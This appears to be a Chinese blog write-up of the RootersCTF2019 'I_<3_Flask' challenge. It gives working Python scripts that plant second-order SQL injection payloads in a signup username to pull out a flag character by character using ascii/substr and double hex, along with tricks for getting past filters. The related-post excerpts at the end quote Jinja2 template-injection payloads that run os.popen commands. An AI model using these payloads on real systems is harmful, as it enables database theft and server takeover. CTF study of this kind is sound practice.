[RootersCTF2019]I_<3_Flask --- sql注入新方法:---‘0’+‘0’的奇怪方式来做 --- 二次注入--hex双重编码- 16进制---ascii也可以的

最新推荐文章于 2024-03-23 12:44:01 发布
最新推荐文章于 2024-03-23 12:44:01 发布
阅读量576 收藏 1
点赞数
分类专栏: BUUCTF刷题记录 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zero_Adam/article/details/115081637
版权

目录:

一、自己看WP后写脚本

关于request和re的使用,可以看这个:sql注入的python脚本学习request + re

我连注册登陆的脚本都写不好,,,写了半天,最后的那个submit不用管,直接就登陆了,然后每次要换一次 邮箱 和 账号

import requests
import re


register_url="http://3c93c7d9-0f4c-499f-905b-7389e11bb946.node3.buuoj.cn/register.php"
login_url="http://3c93c7d9-0f4c-499f-905b-7389e11bb946.node3.buuoj.cn/login.php"

for s in ["sfd","qwer","bt"]:
    
    #这个注入点是名字这里,用单引号的化,进入不了index.php也就是被过滤了,那就尝试其他的东西
    name ="sdf{}".format(s)# 注意换名字的生活,email也要换一下,因为名字是对应Email来找的!!!要记住,我这里也迷了好一会,
    ema="asdf{}".format(s)

    data={"email":ema,"username":name,"password":"aa"}

    data_login={"email":ema,"password":"aa"}
	#这里设置上timeout,防止连接失败,不写也行,我刚刚是网断了,,我靠,
    res=requests.post(url=register_url,data=data,timeout=3)

    res_login = requests.post(url=login_url,data=data_login,timeout=3)

    text = res_login.text
    
    # 找到所有的这个东西,输出出来。username就在这个里面,
    content = re.findall('<span.*</span>',text,re.S)
    for i in content:
        print(i)

    # 这里输出一下url。便于看是否进入了index.php
    print(res.url)
    print(res_login.url)

这里尝试出 '单引号不行,被过滤了,那就尝试 ;分号,堆叠注入,
测试出来了,分号没有被过滤
然后就看WP了吧,

学完了,我连后台的查询语句是什么也没弄清除,,,
吐了,,

二、学到的&&不足

  1. 学习python的re库,便于抓取username所在的地方
  2. +换成 ^也行,记得如果做题的时候这两个不好使,就换成unquote编码,也就是url编码的样式,%2B和什么
  3. 这个用'0'+''+'0'的方法,没学过啊,,

三、学习WP

说是,会看到用户名有回显,所以想到会不会是 sql注入,然后就出入用户名,

WP有尝试报错注入的。嗯嗯,不错的思路,但是 ,逗号被过滤了,不能用报错注入了,,,

WP用的是一种新的sql注入的方法,,,这里学习一下新方法:
在这里插入图片描述

如果用了hex;
在这里插入图片描述

这样’test’字符串的十六进制就会成功显示出来
在这里插入图片描述

但是有个问题,flag的16进制中存在字母,如果让他和’0’相加的化,:
在这里插入图片描述
会存在截断的问题,所以我们应该二次hex:

在这里插入图片描述
让最后的结果全是数字,这样就不存在截断的问题了

但是还有问题。如果结果超过10位的话,会转成科学计数法,像这样

在这里插入图片描述

就会导致丢失数据。因此要用substr来截:
在这里插入图片描述
但是这个题的 逗号 有被过滤了,所以用 from for 来代替逗号

在这里插入图片描述
还有一个问题,就是我们再尝试注入的时候发现information被过滤了。因此必须猜测表名是flag。注入的语句是select * from flag。
注入的姿势如下

+换成 ^也行,记得如果做题的时候这两个不好使,就换成unquote编码,也就是url编码的样式,%2B和什么

学完了,我连后台的查询语句是什么也没弄清除,,,
吐了,,

为什么要用 0 带上,

不清楚啊,,,

ascii方法出flag

找WP的时候,看到了这个ascii方法的。出flag了~~


register_url="http://3c93c7d9-0f4c-499f-905b-7389e11bb946.node3.buuoj.cn/register.php"
login_url="http://3c93c7d9-0f4c-499f-905b-7389e11bb946.node3.buuoj.cn/login.php"

for s in range(100):

    #这个注入点是名字这里,用单引号的化,进入不了index.php也就是被过滤了,那就尝试其他的东西
    #name ="0'%2Bsubstr((hex(hex(select * from flag)) from 1 for 10) from 1 for 10)%2B'0"

    name = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(s+1)


    ema="a1{}".format(s)

    data={"email":ema,"username":name,"password":"aa"}

    data_login={"email":ema,"password":"aa"}

    res=requests.post(url=register_url,data=data,timeout=3)

    res_login = requests.post(url=login_url,data=data_login,timeout=3)

    text = res_login.text

    # 找到所有的这个东西,输出出来。username就在这个里面,
    content = re.findall('<span.*</span>',text,re.S)
    for i in content:
        print(i)

    # 这里输出一下url。便于看是否进入了index.php
    print(res.url)
    print(res_login.url)

我的脚本太屎了,所以其他多余的东西多,,,

在这里插入图片描述然后就出flag了
在这里插入图片描述

 #这个注入点是名字这里,用单引号的化,进入不了index.php也就是被过滤了,那就尝试其他的东西
    name ="0'+( substr(hex(hex((select * from flag ))) from (%d-1)*10+1 for 10))+'0"%s

    #name = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(s+1)

最后换成这个也行,也是一次出一个字符,只不过是16进制的,然后两次hex解码就得到flag了

Zero_Adam
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flask-vuejs-template:Flask + Vue JS模板
02-05
Flask-VueJs-Template :hot_pepper: :victory_hand: Flask + Vue.js Web应用程序模板 产品特点 最小烧瓶1.0应用 API具有基于类的安全资源路由 入门级测试套件 +纱 用于后端通信 Vue样本 一键部署+ Gunicorn的Heroku配置 演示版 备择方案 如果此设置不是您想要的设置,那么这里有一些类似的项目: 旧模板 该模板已更为使用更扁平的文件夹结构,并使用yarn代替npm。 现在,您可以从模板根目录中运行yarn serve以及其他yarn命令。 旧模板将保留在但不会被维护。 Django的 更喜欢Django? 签出 模板结构 该模板使用Flask
基于变结构控制策略的转台控制技术研究
05-05
本文是硕士学位论文,题目是《基于变结构控制策略的转台控制研究》。
[RootersCTF2019]I_3_Flask -不会编程的崽
最新发布
不会编程的崽的博客
03-23 503
参数爆破 简单的jinja&ssti
flask-rebar-auth0:Auth0的Flask-Rebar身份验证器
05-24
Flask-Rebar-Auth0 简单身份验证。 您的访问令牌必须是,此身份验证器才能工作。 初始化 # Config app . config . from_mapping ({ "AUTH0_ENDPOINT" : "perdu.auth0.com" , # The Auth0 domain for your tenant "AUTH0_ALGORITHMS" : [ "RS256" ], # The authorized algorithms, you should not have to change it "AUTH0_AUDIENCE" : "https://api.perdu.com" # The API Identifier as set on Auth0 "AUTH0_HEADER_AUTHENTICA
[RootersCTF2019]I_3_Flask(参数爆破工具arjun)
qq_44657899的博客
08-16 1586
arjun安装 下载地址 s0md3v /Arjun cd Arjun-2.1.4 pip3 install arjun py -3 setup.py install 如果输入arjun -h有如下输出则安装成功 解题 首先使用arjun爆破参数 arjun -u http://aac8b7e4-008f-486a-9642-232db8c62642.node4.buuoj.cn:81/ -c 100 -d 5 参数: -d DELAY Delay between requests in secon
BUUCTF-[RootersCTF2019]I_3_Flask
weixin_49803180的博客
07-17 211
直接利用flask的一个方法:lipsum,在lipsum.__globals__含有os模块,利用方法:{{lipsum.__globals__['os'].popen('ls').read()}}name={{''.__class__.__base__.__subclasses__()[132].__init__}} #查看模块是否被加载。name={{%27%27.__class__.__base__.__subclasses__()}}#查看当前页面下,加载的子类。加载成功就可以利用了。
flask-sql-xss-injection-check:Flask扩展名,用于检查传入请求上SQL和XSS注入
04-05
Flask-SQL-XSS-注入检查 Flask扩展,用于支持对传入请求SQL和XSS注入检查。 对于SQL或XSS注入检查为肯定的请求,这将返回400错误的请求响应 安装 使用pip或easy_install安装扩展。 $ pip install -U flask-sql-xss-injection-check 用法 该软件包公开了Flask扩展,该扩展检查所有传入请求SQL和XSS注入攻击。 from flask import Flask from flask_sql_xss_injection_check import SQLXSSCHECK app = Flask ( __name__ ) SQLXSSCHECK ( app ) @ app . route ( "/" ) def helloWorld (): return "Hello, safe world!
怪异的SQL注入
Wayne_Deng的专栏
06-30 1229
怪异的SQL注入 [ 作者:佚名    转贴自:本站原创    点击数:110    文章录入:angel ] SQL注入以独特、奇、变异的语句迎来了技术又一大突破,当然要针对奇、特这两方面作文章,要达到一出奇招,必达核心!那才是SQL注入技术的根本所在。长期以来,MS SQL以它强大的存储进程给我们带来了极大的方便,而如今注入技术主要依靠IIS出错与MS SQL系统提示信
os模块
qq_45594312的博客
01-11 152
1.概述 os模块提供了多数操作系统的功能接口函数 当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作 在python编程时,经常和文件、目录打交道,所以离不了os模块 2.一些操作 1.返回操作系统类型 程序代码 运行结果 2.操作系统的详细信息 程序代码 运行结果 3.系统的环境边量 程序代码 运行结果 4.判断是否是绝对路径 程序代码 运行结...
[RootersCTF2019]I_3_Flask
fmyyy1的博客
04-15 683
场景 猜测是jinja2的模板注入,用Arjun工具爆破参数 下载地址 找到了参数name 传参?name={{7*'7'}},注入成功 这题没有过滤,直接用常规的注入语句即可 ?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').pop
Flask-2.2.2-py3-none-any.whl
02-04
该资源为Flask-2.2.2-py3-none-any.whl,欢迎下载使用哦!
flask-session-cookie-manager:Flask会话Cookie解码器
02-05
Flask Session Cookie解码器/编码器 原作者: 修复和改进作者: 从导入 依赖 Python 2或Python 3 安装 包 BlackArch Linux # pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn ...
Student_Management_system-FLASK:使用Flask的学生管理网站
05-27
Student_Management_system-FLASK 使用Flask的学生管理网站使用的技术:1-> Python(3.6)2-> Flask 3-> SQLite3 4-> HTML 5,CSS 3,Bootstrap 删除数据库文件运行home.py,使用:“ admin”作为用户名和密码设置...
BUUCTF [RootersCTF2019] I_3_Flask
Senimo
12-19 1207
BUUCTF [RootersCTF2019] I_<3_Flask 考点: Jinjia2模版注入 Arjun参数爆破工具 tplmap模版注入工具 启动环境: 一道Flask题目,大概率为模版注入,先用Arjun工具对可利用传参进行爆破: python3 arjun.py -u http://xxx.node3.buuoj.cn/ -m GET -c 200 得到参数名:name 尝试传入值:?name=1 页面发生了变化,传参被成功执行,尝试模版注入: ?name={{2*2}}
题解([RootersCTF2019]I_3_Flask,[CISCN2019 华东南赛区]Double Secret,[CISCN2019 华东南赛区]Web4)
2202_75361164的博客
11-12 149
抓取/flag,并且将session更改为:eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.ZUjA4g.TDHugXodYeccRQbQmc1SZh9CffA。直接看/flag路由,发现session[‘username’] == 'fuck’时给flag,所以要伪造session,不过我们需要先得到密钥。发现被过滤了,有点不对劲,尝试/index.php发现404,推测为python,尝试。成功,尝试读取/flag,被过滤了。3.读取/app/app.py。
flask mysql sql注入_防止sql注入
weixin_36451983的博客
02-06 1720
@server.route('/login',methods=['post'])def login():username=flask.request.values.get('u')password=flask.request.values.get('p')sql="select * from USER where username='%s' and password='%s';"%(usernam...
[rootersctf2019]i_<3_flask
04-09
不好意思,我是语言模型AI,无法直接回答该问题,但是我可以帮您翻译该问题的意思,该题目应该是一道CTF比赛中的题目,题目名称为"[rootersctf2019]i_<3_flask"。关于具体内容需要参加比赛的选手来解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值